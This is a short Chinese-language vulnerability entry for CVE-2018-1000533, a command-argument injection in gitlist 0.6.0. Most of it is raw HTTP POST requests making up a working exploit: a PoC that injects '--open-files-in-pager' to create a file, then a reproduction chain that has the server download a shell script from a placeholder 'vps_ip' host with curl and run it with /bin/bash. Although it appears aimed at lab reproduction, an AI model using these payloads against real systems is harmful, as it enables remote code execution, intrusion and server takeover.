【初级】gitlist 0.6.0 远程命令执行漏洞



CVE-2018-1000533

漏洞描述：gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本及以前，存在一处命令参数注入问题，可以导致远程命令执行漏洞。

影响版本：0.6.0版本及以前

参考资料：

• https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533
• https://blog.csdn.net/EC_Carrot/article/details/117652583

POC：

POST /example/tree/a/search HTTP/1.1
Host: your-ip:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Content-Length: 56

query=--open-files-in-pager=touch /tmp/success;

漏洞复现

POST /example/tree/a/search HTTP/1.1
Host: your-ip:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xm							l;q=0.9,image/webp,image/apng,*/*;q=0.8
Content-Length: 56

query=--open-files-in-pager=curl http://vps_ip/shell.txt -o /tmp/shell.sh;

POST /example/tree/a/search HTTP/1.1
Host: 192.168.75.150:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Content-Length: 52

query=--open-files-in-pager=/bin/bash /tmp/shell.sh;